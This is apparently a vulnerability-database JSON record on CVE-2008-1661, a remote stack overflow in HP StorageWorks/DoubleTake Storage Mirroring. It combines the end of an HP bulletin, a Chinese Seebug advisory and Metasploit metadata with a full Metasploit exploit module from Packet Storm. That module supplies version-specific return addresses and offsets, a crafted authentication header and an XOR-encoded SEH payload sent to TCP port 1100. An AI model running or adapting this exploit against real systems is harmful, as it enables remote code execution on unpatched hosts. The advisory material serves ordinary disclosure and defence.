this Bulletin. HP recommends that all users determine the\r\napplicability of this information to their individual situations and take appropriate action. HP does not warrant that\r\nthis information is necessarily accurate or complete for all user situations and, consequently, HP will not be\r\nresponsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the\r\nextent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of\r\nmerchantability and fitness for a particular purpose, title and non-infringement."\r\n\r\n\u00a9Copyright 2008 Hewlett-Packard Development Company, L.P. \r\n\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The\r\ninformation provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including\r\ndowntime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for\r\nloss of data, or software restoration. The information in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product and company names mentioned herein may be trademarks of\r\ntheir respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBSEQ5zeAfOvwtKn1ZEQJh5QCeJ0jMp8gDcF3CSyalUVuRQPJA2OkAoP2V\r\n+RrdQ15BV3orpb7CYAdHIZyj\r\n=NwUD\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-06-05T00:00:00", "published": "2008-06-05T00:00:00", "id": "SECURITYVULNS:DOC:19954", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19954", "title": "[security bulletin] HPSBST02312 SSRT071428 rev.1 - HP StorageWorks Storage Mirroring Software, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:24", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1661"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82981", "href": "https://packetstormsecurity.com/files/82981/DoubleTake-HP-StorageWorks-Storage-Mirroring-Service-Authentication-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the authentication mechanism of \nNSI Doubletake which is also rebranded as HP Storage Works. This vulnerability \nwas found by Titon of Bastard Labs. \n}, \n'Author' => [ 'ri0t <ri0t[at]ri0tnet.net>' ], \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2008-1661'], \n['OSVDB', '45924'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 500, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n \n'Targets' => \n[ \n['doubletake 4.5.0', { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ], \n['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ], \n['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ], \n], \n'DefaultTarget' => 0, \n \n'Privileged' => false \n)) \n \nregister_options( \n[ \nOpt::RPORT(1100) \n], self.class) \nend \n \ndef exploit \n \nconnect \n \nprint_status(\"Trying target #{target.name}...\") \n \nheader = \n\"\\x00\\x02\\x00\\x01\\x27\\x30\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+ \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x36\\x00\\x00\\x00\\x00\"+ \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\"+ \n\"\\x00\\x00\\x00\\x1e\\x00\\x00\\x00\\x01\\x00\\x01\" \n \nxor = Rex::Encoding::Xor::Byte \nfiller = rand_text_english(1) * (target['Offset']) \nseh = generate_seh_payload(target.ret) \nbuffercoded = xor.encode(seh+payload.encoded, [0xf0].pack(\"C\")) \nsploit = header + filler + buffercoded[0] \nsock.put(sploit) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82981/doubletake.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T21:38:10", "description": "CVE(CAN) ID: CVE-2008-1661\r\n\r\nHP StorageWorks\u5b58\u50a8\u955c\u50cf\u8f6f\u4ef6\u662f\u4e00\u6b3e\u57fa\u4e8e\u4e3b\u673a\u7684\u8fde\u7eed\u5b58\u50a8\u5907\u4efd\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nHP StorageWorks\u5b58\u50a8\u955c\u50cf\u8f6f\u4ef6\u9ed8\u8ba4\u7ed1\u5b9a\u5728TCP 1100\u30011106\u548cUDP 1105\u7aef\u53e3\u4e0a\u7684DoubleTake.exe\u8fdb\u7a0b\u5728\u5904\u7406\u7f16\u7801\u7684\u8ba4\u8bc1\u8bf7\u6c42\u65f6\u5c06\u7528\u6237\u63d0\u4f9b\u7684\u767b\u5f55\u4fe1\u606f\u62f7\u8d1d\u5230\u4e86\u56fa\u5b9a\u5927\u5c0f\u7684\u6808\u7f13\u51b2\u533a\u4e0a\u3002\u5982\u679c\u7528\u6237\u53d1\u9001\u4e86\u5927\u4e8e256 \u5b57\u8282\u7684\u8d85\u957f\u8ba4\u8bc1\u8bf7\u6c42\u7684\u8bdd\uff0c\u5c31\u4f1a\u5728\u5904\u7406\u5faa\u73af\u4e2d\u89e6\u53d1\u6808\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nHP StorageWorks Storage Mirroring Software v4.5 SP1\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nHP\r\n--\r\nHP\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08HPSBST02312\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nHPSBST02312\uff1aSSRT071428 rev.1 - HP StorageWorks Storage Mirroring Software, Remote Execution of Arbitrary Code\r\n\u94fe\u63a5\uff1a<a href=http://alerts.hp.com/r?2.1.3KT.2ZR.zWmfi.CFU%5fBw..T.E7EI.1SE0.DdFeEZe0 target=_blank>http://alerts.hp.com/r?2.1.3KT.2ZR.zWmfi.CFU%5fBw..T.E7EI.1SE0.DdFeEZe0</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n<a href=http://www.doubletake.com/products/double-take/default.aspx target=_blank>http://www.doubletake.com/products/double-take/default.aspx</a>", "published": "2008-06-18T00:00:00", "type": "seebug", "title": "HP StorageWorks\u5b58\u50a8\u955c\u50cf\u8f6f\u4ef6\u8fdc\u7a0b\u6808\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1661"], "modified": "2008-06-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3430", "id": "SSV:3430", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-06T04:21:14", "description": "This module exploits a stack buffer overflow in the authentication mechanism of NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability was found by Titon of Bastard Labs.\n", "published": "2008-06-06T04:39:44", "type": "metasploit", "title": "DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1661"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/DOUBLETAKE", "href": "", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/doubletake.rb"}]}